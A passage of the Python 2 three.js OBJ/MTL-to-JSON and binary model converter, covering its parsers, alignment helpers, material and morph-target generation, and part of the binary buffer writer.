jsonLoader.load( "Model_ascii.js", function( geometry ) { createScene( geometry ) } );
// load binary model
var binLoader = new THREE.BinaryLoader();
binLoader.load( "Model_bin.js", function( geometry ) { createScene( geometry) } );
function createScene( geometry ) {
var mesh = new THREE.Mesh( geometry, new THREE.MeshFaceMaterial() );
}
...
</script>
-------------------------------------
Parsers based on formats descriptions
-------------------------------------
http://en.wikipedia.org/wiki/Obj
http://en.wikipedia.org/wiki/Material_Template_Library
-------------------
Current limitations
-------------------
- for the moment, only diffuse color and texture are used
(will need to extend shaders / renderers / materials in Three)
- texture coordinates can be wrong in canvas renderer
(there is crude normalization, but it doesn't
work for all cases)
- smoothing can be turned on/off only for the whole mesh
----------------------------------------------
How to get proper OBJ + MTL files with Blender
----------------------------------------------
0. Remove default cube (press DEL and ENTER)
1. Import / create model
2. Select all meshes (Select -> Select All by Type -> Mesh)
3. Export to OBJ (File -> Export -> Wavefront .obj)
- enable following options in exporter
Material Groups
Rotate X90
Apply Modifiers
High Quality Normals
Copy Images
Selection Only
Objects as OBJ Objects
UVs
Normals
Materials
- select empty folder
- give your exported file name with "obj" extension
- click on "Export OBJ" button
4. Your model is now all files in this folder (OBJ, MTL, number of images)
- this converter assumes all files staying in the same folder,
(OBJ / MTL files use relative paths)
- for WebGL, textures must be power of 2 sized
------
Author
------
AlteredQualia http://alteredqualia.com
"""
import fileinput
import operator
import random
import os.path
import getopt
import sys
import struct
import math
import glob
# #####################################################
# Configuration
# #####################################################
ALIGN = "none" # center centerxz bottom top none
SHADING = "smooth" # smooth flat
TYPE = "ascii" # ascii binary
TRANSPARENCY = "normal" # normal invert
TRUNCATE = False
SCALE = 1.0
FRAMESTEP = 1
BAKE_COLORS = False
# default colors for debugging (each material gets one distinct color):
# white, red, green, blue, yellow, cyan, magenta
COLORS = [0xeeeeee, 0xee0000, 0x00ee00, 0x0000ee, 0xeeee00, 0x00eeee, 0xee00ee]
# #####################################################
# Templates
# #####################################################
TEMPLATE_FILE_ASCII = u"""\
{
"metadata" :
{
"formatVersion" : 3,
"sourceFile" : "%(fname)s",
"generatedBy" : "OBJConverter",
"vertices" : %(nvertex)d,
"faces" : %(nface)d,
"normals" : %(nnormal)d,
"colors" : %(ncolor)d,
"uvs" : %(nuv)d,
"materials" : %(nmaterial)d
},
"scale" : %(scale)f,
"materials": [%(materials)s],
"vertices": [%(vertices)s],
"morphTargets": [%(morphTargets)s],
"morphColors": [%(morphColors)s],
"normals": [%(normals)s],
"colors": [%(colors)s],
"uvs": [[%(uvs)s]],
"faces": [%(faces)s]
}
"""
TEMPLATE_FILE_BIN = u"""\
{
"metadata" :
{
"formatVersion" : 3,
"sourceFile" : "%(fname)s",
"generatedBy" : "OBJConverter",
"vertices" : %(nvertex)d,
"faces" : %(nface)d,
"normals" : %(nnormal)d,
"uvs" : %(nuv)d,
"materials" : %(nmaterial)d
},
"materials": [%(materials)s],
"buffers": "%(buffers)s"
}
"""
TEMPLATE_VERTEX = "%f,%f,%f"
TEMPLATE_VERTEX_TRUNCATE = "%d,%d,%d"
TEMPLATE_N = "%.5g,%.5g,%.5g"
TEMPLATE_UV = "%.5g,%.5g"
TEMPLATE_COLOR = "%.3g,%.3g,%.3g"
TEMPLATE_COLOR_DEC = "%d"
TEMPLATE_MORPH_VERTICES = '\t{ "name": "%s", "vertices": [%s] }'
TEMPLATE_MORPH_COLORS = '\t{ "name": "%s", "colors": [%s] }'
# #####################################################
# Utils
# #####################################################
def file_exists(filename):
"""Return true if file exists and is accessible for reading.
Should be safer than just testing for existence due to links and
permissions magic on Unix filesystems.
@rtype: boolean
"""
try:
f = open(filename, 'r')
f.close()
return True
except IOError:
return False
def get_name(fname):
"""Create model name based of filename ("path/fname.js" -> "fname").
"""
return os.path.splitext(os.path.basename(fname))[0]
def bbox(vertices):
"""Compute bounding box of vertex array.
"""
if len(vertices)>0:
minx = maxx = vertices[0][0]
miny = maxy = vertices[0][1]
minz = maxz = vertices[0][2]
for v in vertices[1:]:
if v[0]<minx:
minx = v[0]
elif v[0]>maxx:
maxx = v[0]
if v[1]<miny:
miny = v[1]
elif v[1]>maxy:
maxy = v[1]
if v[2]<minz:
minz = v[2]
elif v[2]>maxz:
maxz = v[2]
return { 'x':[minx,maxx], 'y':[miny,maxy], 'z':[minz,maxz] }
else:
return { 'x':[0,0], 'y':[0,0], 'z':[0,0] }
def translate(vertices, t):
"""Translate array of vertices by vector t.
"""
for i in xrange(len(vertices)):
vertices[i][0] += t[0]
vertices[i][1] += t[1]
vertices[i][2] += t[2]
def center(vertices):
"""Center model (middle of bounding box).
"""
bb = bbox(vertices)
cx = bb['x'][0] + (bb['x'][1] - bb['x'][0])/2.0
cy = bb['y'][0] + (bb['y'][1] - bb['y'][0])/2.0
cz = bb['z'][0] + (bb['z'][1] - bb['z'][0])/2.0
translate(vertices, [-cx,-cy,-cz])
def top(vertices):
"""Align top of the model with the floor (Y-axis) and center it around X and Z.
"""
bb = bbox(vertices)
cx = bb['x'][0] + (bb['x'][1] - bb['x'][0])/2.0
cy = bb['y'][1]
cz = bb['z'][0] + (bb['z'][1] - bb['z'][0])/2.0
translate(vertices, [-cx,-cy,-cz])
def bottom(vertices):
"""Align bottom of the model with the floor (Y-axis) and center it around X and Z.
"""
bb = bbox(vertices)
cx = bb['x'][0] + (bb['x'][1] - bb['x'][0])/2.0
cy = bb['y'][0]
cz = bb['z'][0] + (bb['z'][1] - bb['z'][0])/2.0
translate(vertices, [-cx,-cy,-cz])
def centerxz(vertices):
"""Center model around X and Z.
"""
bb = bbox(vertices)
cx = bb['x'][0] + (bb['x'][1] - bb['x'][0])/2.0
cy = 0
cz = bb['z'][0] + (bb['z'][1] - bb['z'][0])/2.0
translate(vertices, [-cx,-cy,-cz])
def normalize(v):
"""Normalize 3d vector"""
l = math.sqrt(v[0]*v[0] + v[1]*v[1] + v[2]*v[2])
if l:
v[0] /= l
v[1] /= l
v[2] /= l
def veckey3(v):
return round(v[0], 6), round(v[1], 6), round(v[2], 6)
# #####################################################
# MTL parser
# #####################################################
def texture_relative_path(fullpath):
texture_file = os.path.basename(fullpath)
return texture_file
def parse_mtl(fname):
"""Parse MTL file.
"""
materials = {}
for line in fileinput.input(fname):
chunks = line.split()
if len(chunks) > 0:
# Material start
# newmtl identifier
if chunks[0] == "newmtl" and len(chunks) == 2:
identifier = chunks[1]
if not identifier in materials:
materials[identifier] = {}
# Diffuse color
# Kd 1.000 1.000 1.000
if chunks[0] == "Kd" and len(chunks) == 4:
materials[identifier]["colorDiffuse"] = [float(chunks[1]), float(chunks[2]), float(chunks[3])]
# Ambient color
# Ka 1.000 1.000 1.000
if chunks[0] == "Ka" and len(chunks) == 4:
materials[identifier]["colorAmbient"] = [float(chunks[1]), float(chunks[2]), float(chunks[3])]
# Specular color
# Ks 1.000 1.000 1.000
if chunks[0] == "Ks" and len(chunks) == 4:
materials[identifier]["colorSpecular"] = [float(chunks[1]), float(chunks[2]), float(chunks[3])]
# Specular coefficient
# Ns 154.000
if chunks[0] == "Ns" and len(chunks) == 2:
materials[identifier]["specularCoef"] = float(chunks[1])
# Transparency
# Tr 0.9 or d 0.9
if (chunks[0] == "Tr" or chunks[0] == "d") and len(chunks) == 2:
if TRANSPARENCY == "invert":
materials[identifier]["transparency"] = 1.0 - float(chunks[1])
else:
materials[identifier]["transparency"] = float(chunks[1])
# Optical density
# Ni 1.0
if chunks[0] == "Ni" and len(chunks) == 2:
materials[identifier]["opticalDensity"] = float(chunks[1])
# Diffuse texture
# map_Kd texture_diffuse.jpg
if chunks[0] == "map_Kd" and len(chunks) == 2:
materials[identifier]["mapDiffuse"] = texture_relative_path(chunks[1])
# Ambient texture
# map_Ka texture_ambient.jpg
if chunks[0] == "map_Ka" and len(chunks) == 2:
materials[identifier]["mapAmbient"] = texture_relative_path(chunks[1])
# Specular texture
# map_Ks texture_specular.jpg
if chunks[0] == "map_Ks" and len(chunks) == 2:
materials[identifier]["mapSpecular"] = texture_relative_path(chunks[1])
# Alpha texture
# map_d texture_alpha.png
if chunks[0] == "map_d" and len(chunks) == 2:
materials[identifier]["mapAlpha"] = texture_relative_path(chunks[1])
# Bump texture
# map_bump texture_bump.jpg or bump texture_bump.jpg
if (chunks[0] == "map_bump" or chunks[0] == "bump") and len(chunks) == 2:
materials[identifier]["mapBump"] = texture_relative_path(chunks[1])
# Illumination
# illum 2
#
# 0. Color on and Ambient off
# 1. Color on and Ambient on
# 2. Highlight on
# 3. Reflection on and Ray trace on
# 4. Transparency: Glass on, Reflection: Ray trace on
# 5. Reflection: Fresnel on and Ray trace on
# 6. Transparency: Refraction on, Reflection: Fresnel off and Ray trace on
# 7. Transparency: Refraction on, Reflection: Fresnel on and Ray trace on
# 8. Reflection on and Ray trace off
# 9. Transparency: Glass on, Reflection: Ray trace off
# 10. Casts shadows onto invisible surfaces
if chunks[0] == "illum" and len(chunks) == 2:
materials[identifier]["illumination"] = int(chunks[1])
return materials
# #####################################################
# OBJ parser
# #####################################################
def parse_vertex(text):
"""Parse text chunk specifying single vertex.
Possible formats:
vertex index
vertex index / texture index
vertex index / texture index / normal index
vertex index / / normal index
"""
v = 0
t = 0
n = 0
chunks = text.split("/")
v = int(chunks[0])
if len(chunks) > 1:
if chunks[1]:
t = int(chunks[1])
if len(chunks) > 2:
if chunks[2]:
n = int(chunks[2])
return { 'v':v, 't':t, 'n':n }
def parse_obj(fname):
"""Parse OBJ file.
"""
vertices = []
normals = []
uvs = []
faces = []
materials = {}
mcounter = 0
mcurrent = 0
mtllib = ""
# current face state
group = 0
object = 0
smooth = 0
for line in fileinput.input(fname):
chunks = line.split()
if len(chunks) > 0:
# Vertices as (x,y,z) coordinates
# v 0.123 0.234 0.345
if chunks[0] == "v" and len(chunks) == 4:
x = float(chunks[1])
y = float(chunks[2])
z = float(chunks[3])
vertices.append([x,y,z])
# Normals in (x,y,z) form; normals might not be unit
# vn 0.707 0.000 0.707
if chunks[0] == "vn" and len(chunks) == 4:
x = float(chunks[1])
y = float(chunks[2])
z = float(chunks[3])
normals.append([x,y,z])
# Texture coordinates in (u,v[,w]) coordinates, w is optional
# vt 0.500 -1.352 [0.234]
if chunks[0] == "vt" and len(chunks) >= 3:
u = float(chunks[1])
v = float(chunks[2])
w = 0
if len(chunks)>3:
w = float(chunks[3])
uvs.append([u,v,w])
# Face
if chunks[0] == "f" and len(chunks) >= 4:
vertex_index = []
uv_index = []
normal_index = []
for v in chunks[1:]:
vertex = parse_vertex(v)
if vertex['v']:
vertex_index.append(vertex['v'])
if vertex['t']:
uv_index.append(vertex['t'])
if vertex['n']:
normal_index.append(vertex['n'])
faces.append({
'vertex':vertex_index,
'uv':uv_index,
'normal':normal_index,
'material':mcurrent,
'group':group,
'object':object,
'smooth':smooth,
})
# Group
if chunks[0] == "g" and len(chunks) == 2:
group = chunks[1]
# Object
if chunks[0] == "o" and len(chunks) == 2:
object = chunks[1]
# Materials definition
if chunks[0] == "mtllib" and len(chunks) == 2:
mtllib = chunks[1]
# Material
if chunks[0] == "usemtl" and len(chunks) == 2:
material = chunks[1]
if not material in materials:
mcurrent = mcounter
materials[material] = mcounter
mcounter += 1
else:
mcurrent = materials[material]
# Smooth shading
if chunks[0] == "s" and len(chunks) == 2:
smooth = chunks[1]
return faces, vertices, uvs, normals, materials, mtllib
# #####################################################
# Generator - faces
# #####################################################
def setBit(value, position, on):
if on:
mask = 1 << position
return (value | mask)
else:
mask = ~(1 << position)
return (value & mask)
def generate_face(f, fc):
isTriangle = ( len(f['vertex']) == 3 )
if isTriangle:
nVertices = 3
else:
nVertices = 4
hasMaterial = True # for the moment OBJs without materials get default material
hasFaceUvs = False # not supported in OBJ
hasFaceVertexUvs = ( len(f['uv']) >= nVertices )
hasFaceNormals = False # don't export any face normals (as they are computed in engine)
hasFaceVertexNormals = ( len(f["normal"]) >= nVertices and SHADING == "smooth" )
hasFaceColors = BAKE_COLORS
hasFaceVertexColors = False # not supported in OBJ
faceType = 0
faceType = setBit(faceType, 0, not isTriangle)
faceType = setBit(faceType, 1, hasMaterial)
faceType = setBit(faceType, 2, hasFaceUvs)
faceType = setBit(faceType, 3, hasFaceVertexUvs)
faceType = setBit(faceType, 4, hasFaceNormals)
faceType = setBit(faceType, 5, hasFaceVertexNormals)
faceType = setBit(faceType, 6, hasFaceColors)
faceType = setBit(faceType, 7, hasFaceVertexColors)
faceData = []
# order is important, must match order in JSONLoader
# face type
# vertex indices
# material index
# face uvs index
# face vertex uvs indices
# face normal index
# face vertex normals indices
# face color index
# face vertex colors indices
faceData.append(faceType)
# must clamp in case on polygons bigger than quads
for i in xrange(nVertices):
index = f['vertex'][i] - 1
faceData.append(index)
faceData.append( f['material'] )
if hasFaceVertexUvs:
for i in xrange(nVertices):
index = f['uv'][i] - 1
faceData.append(index)
if hasFaceVertexNormals:
for i in xrange(nVertices):
index = f['normal'][i] - 1
faceData.append(index)
if hasFaceColors:
index = fc['material']
faceData.append(index)
return ",".join( map(str, faceData) )
# #####################################################
# Generator - chunks
# #####################################################
def hexcolor(c):
return ( int(c[0] * 255) << 16 ) + ( int(c[1] * 255) << 8 ) + int(c[2] * 255)
def generate_vertex(v, option_vertices_truncate, scale):
if not option_vertices_truncate:
return TEMPLATE_VERTEX % (v[0], v[1], v[2])
else:
return TEMPLATE_VERTEX_TRUNCATE % (scale * v[0], scale * v[1], scale * v[2])
def generate_normal(n):
return TEMPLATE_N % (n[0], n[1], n[2])
def generate_uv(uv):
return TEMPLATE_UV % (uv[0], 1.0 - uv[1])
def generate_color_rgb(c):
return TEMPLATE_COLOR % (c[0], c[1], c[2])
def generate_color_decimal(c):
return TEMPLATE_COLOR_DEC % hexcolor(c)
# #####################################################
# Morphs
# #####################################################
def generate_morph_vertex(name, vertices):
vertex_string = ",".join(generate_vertex(v, TRUNCATE, SCALE) for v in vertices)
return TEMPLATE_MORPH_VERTICES % (name, vertex_string)
def generate_morph_color(name, colors):
color_string = ",".join(generate_color_rgb(c) for c in colors)
return TEMPLATE_MORPH_COLORS % (name, color_string)
def extract_material_colors(materials, mtlfilename, basename):
"""Extract diffuse colors from MTL materials
"""
if not materials:
materials = { 'default': 0 }
mtl = create_materials(materials, mtlfilename, basename)
mtlColorArraySrt = []
for m in mtl:
if m in materials:
index = materials[m]
color = mtl[m].get("colorDiffuse", [1,0,0])
mtlColorArraySrt.append([index, color])
mtlColorArraySrt.sort()
mtlColorArray = [x[1] for x in mtlColorArraySrt]
return mtlColorArray
def extract_face_colors(faces, material_colors):
"""Extract colors from materials and assign them to faces
"""
faceColors = []
for face in faces:
material_index = face['material']
faceColors.append(material_colors[material_index])
return faceColors
def generate_morph_targets(morphfiles, n_vertices, infile):
skipOriginalMorph = False
norminfile = os.path.normpath(infile)
morphVertexData = []
for mfilepattern in morphfiles.split():
matches = glob.glob(mfilepattern)
matches.sort()
indices = range(0, len(matches), FRAMESTEP)
for i in indices:
path = matches[i]
normpath = os.path.normpath(path)
if normpath != norminfile or not skipOriginalMorph:
name = os.path.basename(normpath)
morphFaces, morphVertices, morphUvs, morphNormals, morphMaterials, morphMtllib = parse_obj(normpath)
n_morph_vertices = len(morphVertices)
if n_vertices != n_morph_vertices:
print "WARNING: skipping morph [%s] with different number of vertices [%d] than the original model [%d]" % (name, n_morph_vertices, n_vertices)
else:
if ALIGN == "center":
center(morphVertices)
elif ALIGN == "centerxz":
centerxz(morphVertices)
elif ALIGN == "bottom":
bottom(morphVertices)
elif ALIGN == "top":
top(morphVertices)
morphVertexData.append((get_name(name), morphVertices))
print "adding [%s] with %d vertices" % (name, n_morph_vertices)
morphTargets = ""
if len(morphVertexData):
morphTargets = "\n%s\n\t" % ",\n".join(generate_morph_vertex(name, vertices) for name, vertices in morphVertexData)
return morphTargets
def generate_morph_colors(colorfiles, n_vertices, n_faces):
morphColorData = []
colorFaces = []
materialColors = []
for mfilepattern in colorfiles.split():
matches = glob.glob(mfilepattern)
matches.sort()
for path in matches:
normpath = os.path.normpath(path)
name = os.path.basename(normpath)
morphFaces, morphVertices, morphUvs, morphNormals, morphMaterials, morphMtllib = parse_obj(normpath)
n_morph_vertices = len(morphVertices)
n_morph_faces = len(morphFaces)
if n_vertices != n_morph_vertices:
print "WARNING: skipping morph color map [%s] with different number of vertices [%d] than the original model [%d]" % (name, n_morph_vertices, n_vertices)
elif n_faces != n_morph_faces:
print "WARNING: skipping morph color map [%s] with different number of faces [%d] than the original model [%d]" % (name, n_morph_faces, n_faces)
else:
morphMaterialColors = extract_material_colors(morphMaterials, morphMtllib, normpath)
morphFaceColors = extract_face_colors(morphFaces, morphMaterialColors)
morphColorData.append((get_name(name), morphFaceColors))
# take first color map for baking into face colors
if len(colorFaces) == 0:
colorFaces = morphFaces
materialColors = morphMaterialColors
print "adding [%s] with %d face colors" % (name, len(morphFaceColors))
morphColors = ""
if len(morphColorData):
morphColors = "\n%s\n\t" % ",\n".join(generate_morph_color(name, colors) for name, colors in morphColorData)
return morphColors, colorFaces, materialColors
# #####################################################
# Materials
# #####################################################
def generate_color(i):
"""Generate hex color corresponding to integer.
Colors should have well defined ordering.
First N colors are hardcoded, then colors are random
(must seed random number generator with deterministic value
before getting colors).
"""
if i < len(COLORS):
#return "0x%06x" % COLORS[i]
return COLORS[i]
else:
#return "0x%06x" % int(0xffffff * random.random())
return int(0xffffff * random.random())
def value2string(v):
if type(v)==str and v[0:2] != "0x":
return '"%s"' % v
elif type(v) == bool:
return str(v).lower()
return str(v)
def generate_materials(mtl, materials):
"""Generate JS array of materials objects
JS material objects are basically prettified one-to-one
mappings of MTL properties in JSON format.
"""
mtl_array = []
for m in mtl:
if m in materials:
index = materials[m]
# add debug information
# materials should be sorted according to how
# they appeared in OBJ file (for the first time)
# this index is identifier used in face definitions
mtl[m]['DbgName'] = m
mtl[m]['DbgIndex'] = index
mtl[m]['DbgColor'] = generate_color(index)
if BAKE_COLORS:
mtl[m]['vertexColors'] = "face"
mtl_raw = ",\n".join(['\t"%s" : %s' % (n, value2string(v)) for n,v in sorted(mtl[m].items())])
mtl_string = "\t{\n%s\n\t}" % mtl_raw
mtl_array.append([index, mtl_string])
return ",\n\n".join([m for i,m in sorted(mtl_array)])
def generate_mtl(materials):
"""Generate dummy materials (if there is no MTL file).
"""
mtl = {}
for m in materials:
index = materials[m]
mtl[m] = {
'DbgName': m,
'DbgIndex': index,
'DbgColor': generate_color(index)
}
return mtl
def generate_materials_string(materials, mtlfilename, basename):
"""Generate final materials string.
"""
if not materials:
materials = { 'default': 0 }
mtl = create_materials(materials, mtlfilename, basename)
return generate_materials(mtl, materials)
def create_materials(materials, mtlfilename, basename):
"""Parse MTL file and create mapping between its materials and OBJ materials.
Eventual edge cases are handled here (missing materials, missing MTL file).
"""
random.seed(42) # to get well defined color order for debug colors
# default materials with debug colors for when
# there is no specified MTL / MTL loading failed,
# or if there were no materials / null materials
mtl = generate_mtl(materials)
if mtlfilename:
# create full pathname for MTL (included from OBJ)
path = os.path.dirname(basename)
fname = os.path.join(path, mtlfilename)
if file_exists(fname):
# override default materials with real ones from MTL
# (where they exist, otherwise keep defaults)
mtl.update(parse_mtl(fname))
else:
print "Couldn't find [%s]" % fname
return mtl
# #####################################################
# Faces
# #####################################################
def is_triangle_flat(f):
return len(f['vertex'])==3 and not (f["normal"] and SHADING == "smooth") and not f['uv']
def is_triangle_flat_uv(f):
return len(f['vertex'])==3 and not (f["normal"] and SHADING == "smooth") and len(f['uv'])==3
def is_triangle_smooth(f):
return len(f['vertex'])==3 and f["normal"] and SHADING == "smooth" and not f['uv']
def is_triangle_smooth_uv(f):
return len(f['vertex'])==3 and f["normal"] and SHADING == "smooth" and len(f['uv'])==3
def is_quad_flat(f):
return len(f['vertex'])==4 and not (f["normal"] and SHADING == "smooth") and not f['uv']
def is_quad_flat_uv(f):
return len(f['vertex'])==4 and not (f["normal"] and SHADING == "smooth") and len(f['uv'])==4
def is_quad_smooth(f):
return len(f['vertex'])==4 and f["normal"] and SHADING == "smooth" and not f['uv']
def is_quad_smooth_uv(f):
return len(f['vertex'])==4 and f["normal"] and SHADING == "smooth" and len(f['uv'])==4
def sort_faces(faces):
data = {
'triangles_flat': [],
'triangles_flat_uv': [],
'triangles_smooth': [],
'triangles_smooth_uv': [],
'quads_flat': [],
'quads_flat_uv': [],
'quads_smooth': [],
'quads_smooth_uv': []
}
for f in faces:
if is_triangle_flat(f):
data['triangles_flat'].append(f)
elif is_triangle_flat_uv(f):
data['triangles_flat_uv'].append(f)
elif is_triangle_smooth(f):
data['triangles_smooth'].append(f)
elif is_triangle_smooth_uv(f):
data['triangles_smooth_uv'].append(f)
elif is_quad_flat(f):
data['quads_flat'].append(f)
elif is_quad_flat_uv(f):
data['quads_flat_uv'].append(f)
elif is_quad_smooth(f):
data['quads_smooth'].append(f)
elif is_quad_smooth_uv(f):
data['quads_smooth_uv'].append(f)
return data
# #####################################################
# API - ASCII converter
# #####################################################
def convert_ascii(infile, morphfiles, colorfiles, outfile):
"""Convert infile.obj to outfile.js
Here is where everything happens. If you need to automate conversions,
just import this file as Python module and call this method.
"""
if not file_exists(infile):
print "Couldn't find [%s]" % infile
return
# parse OBJ / MTL files
faces, vertices, uvs, normals, materials, mtllib = parse_obj(infile)
n_vertices = len(vertices)
n_faces = len(faces)
# align model
if ALIGN == "center":
center(vertices)
elif ALIGN == "centerxz":
centerxz(vertices)
elif ALIGN == "bottom":
bottom(vertices)
elif ALIGN == "top":
top(vertices)
# generate normals string
nnormal = 0
normals_string = ""
if SHADING == "smooth":
normals_string = ",".join(generate_normal(n) for n in normals)
nnormal = len(normals)
# extract morph vertices
morphTargets = generate_morph_targets(morphfiles, n_vertices, infile)
# extract morph colors
morphColors, colorFaces, materialColors = generate_morph_colors(colorfiles, n_vertices, n_faces)
# generate colors string
ncolor = 0
colors_string = ""
if len(colorFaces) < len(faces):
colorFaces = faces
materialColors = extract_material_colors(materials, mtllib, infile)
if BAKE_COLORS:
colors_string = ",".join(generate_color_decimal(c) for c in materialColors)
ncolor = len(materialColors)
# generate ascii model string
text = TEMPLATE_FILE_ASCII % {
"name" : get_name(outfile),
"fname" : os.path.basename(infile),
"nvertex" : len(vertices),
"nface" : len(faces),
"nuv" : len(uvs),
"nnormal" : nnormal,
"ncolor" : ncolor,
"nmaterial" : len(materials),
"materials" : generate_materials_string(materials, mtllib, infile),
"normals" : normals_string,
"colors" : colors_string,
"uvs" : ",".join(generate_uv(uv) for uv in uvs),
"vertices" : ",".join(generate_vertex(v, TRUNCATE, SCALE) for v in vertices),
"morphTargets" : morphTargets,
"morphColors" : morphColors,
"faces" : ",".join(generate_face(f, fc) for f, fc in zip(faces, colorFaces)),
"scale" : SCALE
}
out = open(outfile, "w")
out.write(text)
out.close()
print "%d vertices, %d faces, %d materials" % (len(vertices), len(faces), len(materials))
# #############################################################################
# API - Binary converter
# #############################################################################
def dump_materials_to_buffer(faces, buffer):
for f in faces:
data = struct.pack('<H',
f['material'])
buffer.append(data)
def dump_vertices3_to_buffer(faces, buffer):
for f in faces:
vi = f['vertex']
data = struct.pack('<III',
vi[0]-1, vi[1]-1, vi[2]-1)
buffer.append(data)
def dump_vertices4_to_buffer(faces, buffer):
for f in faces:
vi = f['vertex']
data = struct.pack('<IIII',
vi[0]-1, vi[1]-1, vi[2]-1, vi[3]-1)
buffer.append(data)
def dump_normals3_to_buffer(faces, buffer):
for f in faces:
ni = f['normal']
data = struct.pack('<III',
ni[0]-1, ni[1]-1, ni[2]-1)
buffer.append(data)
def dump_normals4_to_buffer(faces, buffer):
for f in faces:
ni = f['normal']
data = struct.pack('<IIII',
ni[0]-1, ni[1]-1, ni[2]-1, ni[3]-1)
buffer.append(data)
def dump_uvs3_to_buffer(faces, buffer):
for f in faces:
ui = f['uv']
data = struct.pack('<III',
ui[0]-1, ui[1]-1, ui[2]-1)
buffer.append(data)
def dump_uvs4_to_buffer(faces, buffer):
for f in faces:
ui = f['uv']
data = struct.pack('<IIII',
ui[0]-1, ui[1]-1, ui[2]-1, ui[3]-1)
buffer.append(data)
def add_padding(buffer, n):
if n % 4:
for i in range(4 - n % 4):
data = struct.pack('<B', 0)
buffer.append(data)
def convert_binary(infile, outfile):
"""Convert infile.obj to outfile.js + outfile.bin
"""
if not file_exists(infile):
print "Couldn't find [%s]" % infile
return
binfile = get_name(outfile) + ".bin"
faces, vertices, uvs, normals, materials, mtllib = parse_obj(infile)
if ALIGN == "center":
center(vertices)
elif ALIGN == "centerxz":
centerxz(vertices)
elif ALIGN == "bottom":
bottom(vertices)
elif ALIGN == "top":
top(vertices)
sfaces = sort_faces(faces)
if SHADING == "smooth":
nnormals = len(normals)
else:
nnormals = 0
# ###################
# generate JS file
# ###################
text = TEMPLATE_FILE_BIN % {
"name" : get_name(outfile),
"materials" : generate_materials_string(materials, mtllib, infile),
"buffers" : binfile,
"fname" : os.path.basename(infile),
"nvertex" : len(vertices),
"nface" : len(faces),
"nmaterial" : len(materials),
"nnormal" : nnormals,
"nuv" : len(uvs)
}
out = open(outfile, "w")
out.write(text)
out.close()
# ###################
# generate BIN file
# ###################
buffer = []
# header
# ------
header_bytes = struct.calcsize('<12s')
header_bytes += struct.calcsize('<BBBBBBBB')
header_bytes += struct.calcsize('<IIIIIIIIIII')
# signature
signature = struct.pack('<12s', 'Three.js 003')
# metadata (all data is little-endian)
vertex_coordinate_bytes = 4
normal_coordinate_bytes = 1
uv_coordinate_bytes = 4
vertex_index_bytes = 4
normal_index_bytes = 4
uv_index_bytes = 4
material_index_bytes = 2
# header_bytes unsigned char 1
# vertex_coordinate_bytes unsigned char 1
# normal_coordinate_bytes unsigned char 1
# uv_coordinate_bytes unsigned char 1
# vertex_index_bytes unsigned char 1
# normal_index_bytes unsigned char 1
# uv_index_bytes unsigned char 1
# material_index_bytes unsigned char 1
bdata = struct.pack('<BBBBBBBB', header_bytes,
vertex_coordinate_bytes,
normal_coordinate_bytes,
uv_coordinate_bytes,
vertex_index_bytes,
normal_index_bytes,
uv_index_bytes,
material_index_bytes)
ntri_flat = len(sfaces['triangles_flat'])
ntri_smooth = len(sfaces['triangles_smooth'])
ntri_flat_uv = len(sfaces['triangles_flat_uv'])
ntri_smooth_uv = len(sfaces['triangles_smooth_uv'])
nquad_flat = len(sfaces['quads_flat'])
nquad_smooth = len(sfaces['quads_smooth'])
nquad_flat_uv = len(sfaces['quads_flat_uv'])
nquad_smooth_uv = len(sfaces['quads_smooth_uv'])
# nvertices unsigned int 4
# nnormals unsigned int 4
# nuvs unsigned int 4
# ntri_flat unsigned int 4
# ntri_smooth unsigned int 4
# ntri_flat_uv unsigned int 4
# ntri_smooth_uv unsigned int 4
# nquad_flat unsigned int 4
# nquad_smooth unsigned int 4
# nquad_flat_uv unsigned int 4
# nquad_smooth_uv unsigned int 4
ndata = struct.pack('<IIIIIIIIIII', len(vertices),
nnormals,
len(uvs),
ntri_flat,
ntri_smooth,
ntri_flat_uv,
ntri_smooth_uv,
nquad_flat,
nquad_smooth,
nquad_flat_uv,
nquad_smooth_uv)
buffer.append(signature)
buffer.append(bdata)
buffer.append(ndata)
# 1. vertices
# ------------
# x float 4
# y float 4
# z float 4
for v in vertices:
data = struct.pack('<fff', v[0], v[1], v[2])
buffer.append(data)
# 2. normals
# ---------------
# x signed char 1
# y signed char 1
# z signed char 1
if SHADING == "smooth":
for n in normals:
normalize(n)
data = struct.pack('<bbb', math.floor(n[0]*127+0.5),
math.floor(n[1]*127+0.5),
math.floor(n[2]*127+0.5))
buffer.append(data)
add_padding(buffer, nnormals * 3)
# 3. uvs
# -----------
# u float 4
# v float 4
for uv in uvs:
data = struct.pack('<ff', uv[0], 1.0-uv[1])
buffer.append(data)
# padding
#data = struct.pack('<BB', 0, 0)
#buffer.append(data)
# 4. flat triangles (vertices + materials)
# ------------------
# a unsigned int 4
# b unsigned int 4
# c unsigned int 4
# ------------------
# m unsigned short 2
dump_vertices3_to_buffer(sfaces['triangles_flat'], buffer)
dump_materials_to_buffer(sfaces['triangles_flat'], buffer)
add_padding(buffer, ntri_flat * 2)
# 5. smooth triangles (vertices + materials + normals)
# -------------------
# a unsigned int 4
# b unsigned int 4
# c unsigned int 4
# -------------------
# na unsigned int 4
# nb unsigned int 4
# nc unsigned int 4
# -------------------
# m unsigned short 2
dump_vertices3_to_buffer(sfaces['triangles_smooth'], buffer)
dump_normals3_to_buffer(sfaces['triangles_smooth'], buffer)
dump_materials_to_buffer(sfaces['triangles_smooth'], buffer)
add_padding(buffer, ntri_smooth * 2)
# 6. flat triangles uv (vertices + materials + uvs)
# --------------------
# a unsigned int 4
# b unsigned int 4
# c unsigned int 4
# --------------------
# ua unsigned int 4
# ub unsigned int 4
# uc unsigned int 4
# --------------------
# m unsigned short 2
dump_vertices3_to_buffer(sfaces['triangles_flat_uv'], buffer)
dump_uvs3_to_buffer(sfaces['triangles_flat_uv'], buffer)
dump_materials_to_buffer(sfaces['triangles_flat_uv'], buffer)
add_padding(buffer, ntri_flat_uv * 2)
# 7. smooth triangles uv (vertices + materials + normals + uvs)
# ----------------------
# a unsigned int 4
# b unsigned int 4
# c unsigned int 4
# --------------------
# na unsigned int 4
# nb unsigned int 4
# nc unsigned int 4
# --------------------
# ua unsigned int 4
# ub unsigned int 4
# uc unsigned int 4
# --------------------
# m unsigned short 2
dump_vertices3_to_buffer(sfaces['triangles_smooth_uv'], buffer)
dump_normals3_to_buffer(sfaces['triangles_smooth_uv'], buffer)
dump_uvs3_to_buffer(sfaces['triangles_smooth_uv'], buffer)
dump_materials_to_buffer(sfaces['triangles_smooth_uv'], buffer)
add_padding(buffer, ntri_smooth_uv * 2)
# 8. flat quads (vertices + materials)
# ------------------
# a unsigned int 4
# b unsigned int 4
# c unsigned int 4
